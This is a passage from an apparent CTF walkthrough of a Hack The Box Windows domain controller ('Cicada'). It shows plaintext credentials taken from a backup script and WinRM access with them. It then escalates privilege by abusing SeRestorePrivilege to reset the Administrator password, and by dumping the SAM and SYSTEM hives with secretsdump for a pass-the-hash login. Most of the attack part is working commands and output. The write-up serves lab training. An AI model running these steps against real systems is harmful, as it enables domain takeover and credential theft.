KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size min: 23 B SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size max: 5.22 KB Whilst examining the output I noted there was a file in the "DEV" share; Backup_script.ps1 . I then downloaded the file: ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u david.orelious -p 'aRt$Lp#7t*VQ!3' --share "DEV" --get-file "Backup_script.ps1" ./BackUp.ps1 SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.129.231.149 445 CICADA-DC [*] Copying "Backup_script.ps1" to "./BackUp.ps1" SMB 10.129.231.149 445 CICADA-DC [+] File "Backup_script.ps1" was downloaded to "./BackUp.ps1" Contents of Backup_script.ps1 $sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath" This is a script to perform backups of emily.oscars' SMB share: there is a plain text credential stored in the script. emily.oscars:Q!3@Lp#M6b*7t*Vt I then confirmed that this user had winrm access: ──(root㉿user)-[/home/user] └─# nxc winrm $target -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' WINRM 10.129.231.149 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) /usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0. arc4 = algorithms.ARC4(self._key) WINRM 10.129.231.149 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!) A quick and easy way to escalate privilege is by checking the privileges: *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabl Now: there are TWO WAYS to escalate privilege to administrator on the machine. SeRestorePrivilege (first way to become administrator) PS1 script Click on the Github repo link to grab the PS1 script and transfer it to the target machine: below is the output demonstrating how to use SeRestorrivilege to get code execution as administrator. *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Import-Module ./Invoke-SeRestoreAbuse.ps1 *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Invoke-SeRestoreAbuse -Command 'cmd /c powershell -c "whoami > C:\Users\emily.oscars.CICADA\Documents\foo.txt"' [+] SeRestorePrivilege privilege enabled [+] ImagePath set to: cmd /c powershell -c "whoami > C:\Users\emily.oscars.CICADA\Documents\foo.txt" [+] Seclogon service started [+] ImagePath restored to: %windir%\system32\svchost.exe -k netsvcs -p *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir Directory: C:\Users\emily.oscars.CICADA\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/23/2026 7:31 AM 44 foo.txt -a---- 3/23/2026 6:01 AM 6537 Invoke-SeRestoreAbuse.ps1 *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type foo.txt nt authority\system You can use this script to execute any command as administrator; I simply changed the administrator's password with the syntax below. *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> Invoke-SeRestoreAbuse -Command 'net user Administrator P@ssword123!' [+] SeRestorePrivilege privilege enabled [+] ImagePath set to: net user Administrator P@ssword123! [+] Seclogon service started [+] ImagePath restored to: %windir%\system32\svchost.exe -k netsvcs - You can now confirm that the password change was successful via ldap: ┌──(root㉿user)-[/home/…/HTBox/CPTS/HTBox/tools] └─# nxc ldap $target -u administrator -p P@ssword123! LDAP 10.129.231.149 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) LDAP 10.129.231.149 389 CICADA-DC [+] cicada.htb\administrator:P@ssword123! (Pwn3d!) You could now login as the administrator, use a Netexec module (-M sam or -M ntdsutil) to dump the hashes for the domain or even send yourself a reverse shell. The possibilities are endless as you have RCE as the administrator. SeBackUpPrivilege (second way to become administrator) A user with this privilege can back up the Windows registry hives — specifically the SAM , SYSTEM , and SECURITY files — is a post-exploitation technique used to extract the machine's "boot key," which then allows us to decrypt and dump local user credentials and cached password hashes for offline cracking or lateral movement. Note: these are LOCAL credentials. Firstly, we are going to copy the SAM and SYSTEM files (I attempted the security file but this failed — which doesn't matter) *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg.exe save hklm\sam C:\Users\emily.oscars.CICADA\Documents\sam.save The operation completed successfully. *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg.exe save hklm\security C:\Users\emily.oscars.CICADA\Documents\security.save reg.exe : ERROR: Access is denied. + CategoryInfo : NotSpecified: (ERROR: Access is denied.:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg.exe save hklm\system C:\Users\emily.oscars.CICADA\Documents\system.save The operation completed successfully. Secondly, we want to download the SAM and SYSTEM files to our Kali machine. Evil-winrm makes this very easy with this download flag. *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir Directory: C:\Users\emily.oscars.CICADA\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/23/2026 2:44 AM 49152 sam.save -a---- 3/23/2026 2:44 AM 18558976 system.save *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam.save Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam.save to sam.save Info: Download successful! *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system.save Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system.save to system.save Progress: 23% : |▓▒░░░░░░░░| Run impacket-secretsdump with the following syntax to obtain the hashes: ┌──(root㉿user)-[/home/user/bhs] └─# impacket-secretsdump -sam sam.save -system system.save LOCAL Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Cleaning up... Once you have the hash of any target user, you can authenticate with it as if it were a plain text password to login as them (pass the hash attack): ┌──(root㉿user)-[/home/user/bhs] └─# evil-winrm -i $target -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami cicada\administrator #hacking #ctf #bug-bounty #bug-hunting #oscp Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories